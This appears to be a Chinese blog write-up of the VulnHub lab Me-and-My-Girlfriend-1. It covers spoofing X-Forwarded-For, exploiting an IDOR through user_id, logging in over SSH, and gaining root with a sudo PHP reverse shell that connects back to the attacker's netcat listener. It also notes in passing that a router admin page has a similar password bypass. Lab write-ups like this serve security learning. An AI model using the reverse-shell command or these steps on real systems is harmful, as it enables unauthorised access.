前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >vulnhub之Me-and-My-Girlfriend-1实战

vulnhub之Me-and-My-Girlfriend-1实战

作者头像
鸿鹄实验室
发布2021-04-15 10:33:18
6530
发布2021-04-15 10:33:18
举报
文章被收录于专栏:鸿鹄实验室鸿鹄实验室

运行说明

靶机名称:Me-and-My-Girlfriend-1

靶机难度:初学者/中级

目标:有两个flag,一个user-flag,一个root-flag

攻击机:kali linux,IP地址192.168.153.139

靶机:Me-and-My-Girlfriend-1,IP地址192.168.153.147

渗透过程

1. 主机发现,对比开关主机前后发现目标主机

2. 扫描开放端口等信息

3.存在80端口,查看网页

提示信息的意思是,把x-forwarded-for这个参数值改为本地值

I.使用burpsuite来修改

在bp的代理页中,添加一项本地参数并勾选,这样每次发包经过bp就会添加一个本地参数

II. 使用chrom插件X-Forwarded-For Header

4.进入主网页,可以看到网站给出了Home Login Register About四个按钮

Home为主页按钮

Login为登录按钮,弱口令尝试登陆无效

Register为注册按钮,我们注册一个账号

发现url参数中可以看到用户id,这里尝试修改user_id值,是否存在水平越权

纯在水平越权,并且修改前端type为test即可查看密码。联通光猫的管理界面也是纯在这个彩蛋的,并且超级管理员密码可以绕过查看。

根据提示我们需要寻找一个叫alice的账号,id需改为5时alice账户。

5. Nmap扫描时发现可以ssh远程连接,连接查看

查看信息

发现第一个flag

6. 提权

查看alice的权限

Alice可在主机中所使用root权限

Web服务器为Apache,所以我们进入目录下查看信息

7. 发现了一些美妙的东西,看了别人的步骤才知道,我没有进行目录扫描,之前没有发现这些目录和信息,不过小小不言。

进入config目录

查看,发现更美妙的东西

尝试连接sql数据库查看信息

额 没什么用

利用nc反弹shell

在kali开启nc反弹端口 nc -lvp 7777

然后靶机上的alice创建一个php反弹shell去连接它:

sudo/usr/bin/php-r '$sock=fsockopen("192.168.153.139",7777);exec("/bin/bash -i <&3 >&3 2>&3");'

返回kali这边已经登录进root了

8. Nc反弹shell的几种常用方式

https://www.cnblogs.com/-chenxs/p/11748488.html

9. 其实mysql密码就是root的登录密码233333

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-01-31,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 鸿鹄实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档